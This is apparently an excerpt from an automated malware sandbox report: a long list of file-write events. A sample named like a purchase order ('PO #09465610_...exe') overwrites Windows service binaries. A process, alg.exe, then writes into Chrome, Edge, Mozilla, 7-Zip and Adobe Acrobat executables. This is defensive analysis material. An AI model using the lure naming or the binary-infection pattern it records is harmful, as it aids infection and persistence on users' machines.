                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Users\user\AppData\Local\Temp\uncolorable offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 767488Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1341004Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1344512Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1347720Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 1340928Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 409168Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\AppVClient.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Windows\System32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.bin offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 557056Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 1130572Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 1130496Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 382726Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7z.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 952832Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 1526348Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 1526272Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 614020Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Users\user\AppData\Local\Temp\aut8C49.tmp offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 700416Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 1273932Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 1273856Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 464916Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\7zG.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\7-Zip\Uninstall.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0Jump to behavior
